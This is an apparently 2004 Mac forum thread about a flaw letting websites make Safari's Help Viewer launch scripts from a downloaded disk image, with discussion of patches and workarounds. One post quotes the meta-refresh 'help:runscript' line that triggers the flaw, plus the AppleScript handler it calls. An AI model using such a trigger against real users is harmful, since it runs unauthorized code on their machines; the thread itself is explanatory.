Slashdot has a story up in the Apple section about a new exploit found that will allow Safari to run unauthorized programs. This (http://www.insecure.ws/article.php?story=2004051612423136) seems to be a description and demonstration of the problem.

I'm don't really know what this all means, but hopefully someone can point out why this is A Bad Thing¬

Have I told you that I love OmniWeb?

I just downloaded the exploit with OW, it mounted the disk-image, showed me the content of it and then nothing more happened. For those who are asking, the exploit app is right now a terminal script.

I'm don't really know what this all means, but hopefully someone can point out why this is A Bad Thingå
This means that any website can launch applications on your Mac.

in a html page:

HTTP-EQUIV="refresh" content="0; URL=help:runscript=MacHelp.help/Contents/Resources/English.lproj/shrd/OpnApp.scpt string='Volumes:0x04_script:0x04_script.term'"

simply means that Safari launches the helper (Help Viewer.app) which then launches "Volumes:0x04_script:0x04_script.term", which, in this case, is a file on a mounted disk image that you've previously downloaded. But you could also open any other launchable application or script.

Why this is bad? Because they can make you download just about any script they want and then execute it, for example a script that erases your home directory.

That means that this exploit only works for Safari. For now.


This is the apple script that gets called:
on <<event helphdhp>> (completeParam)
-- localizable text
set cancelBtn to "Cancel"
set errorText to "The item cannot be opened. It may be disabled or not installed."
--end localizable text

try
tell application "Finder"
open file completeParam of the startup disk
end tell

on error errMsg number errNum
display dialog errorText buttons {cancelBtn} default button 1 with icon 0
return
end try
end <<event helphdhp>>

this works (or is vunerable) in Camino as well. at least the build i'm using.

Discussion (http://discussions.info.apple.com/WebX?14@29.ytyhaR0Emal.1@.68936654/17) of fixes in Apple's Safari forums has pointed to this fix, which rewrites the helper app for help viewer to solve the problem for now

http://www.isophonic.net/

The tool is at the top of the list... "Don't Go There GURLFriend"

The previously suggested fix of:
uncheck the "open safe files after d/l" in Safari prefs
will NOT protect you.

The new fix apparently does. (comes with a test button for before/after validation)

YMMV

Slashdot has a story up in the Apple section about a new exploit found that will allow Safari to run unauthorized programs. This (http://www.insecure.ws/article.php?story=2004051612423136) seems to be a description and demonstration of the problem.

I'm don't really know what this all means, but hopefully someone can point out why this is A Bad ThingÂ

Isn't this a Help Viewer flaw and not a Safari flaw?

Safari unwittingly (perhaps not the right word) opens addresses that start disk:// instead of http://
so an unscrupulous website could build a meta-refresh to a .dmg which you'd blithely mount

That's pretty cool. It did freak me out when I first did it.

Its starting...

I've heard of more "vulnerabilities" and "exploits" in OSX and Mac apps recently than ever before. Is the Mac starting to lose its aura of invulnerability?

Its starting...

I've heard of more "vulnerabilities" and "exploits" in OSX and Mac apps recently than ever before. Is the Mac starting to lose its aura of invulnerability?

The Help Viewer flaw looks like it can turn out to be quite serious and I hope Apple responds quickly, but look at the bright side: after four years of OSX on the market, only two exploits have be developed and one of them (the Help Viewer one) exists at this moment as a proof of concept.

OSX is still extremely safe. Ports are turned by default. Passwords are needed to install software. User's are usually safe from other users mischief. Root is off by default. Etc...

The real question here is why hasn't this flaw been patched yet!!!!
I've read in several places that Apple knew about this issue in mid Feb., is Apple taking the M$ approach to patching now. Only patch when the flaw hits!

Come on Apple!


My boss had the balls to tell me yesterday that we shouldn't use Apples anymore because of how long it is taking Apple to patch this flaw (yes he was serious, he is bought and paid for by M$), to which I responded: How much has any security hole in an Apple OS cost us in the past 2 years? How about the same in any M$ OS in the same time period?
This shut him up pretty fast.

Patch available in software update.

BE WARNED:

I installed the Apple Security Patch last night but am still NOT protected from a similar (same?) problem decscribed by Unsanity. (http://www.unsanity.com/haxies/pa/whitepaper) The good news is, until Apple yanks their head out of their butt (how did they miss this one???), Unsanity has provided a free work-around called Paranoid Android. (http://www.unsanity.com/haxies/pa/)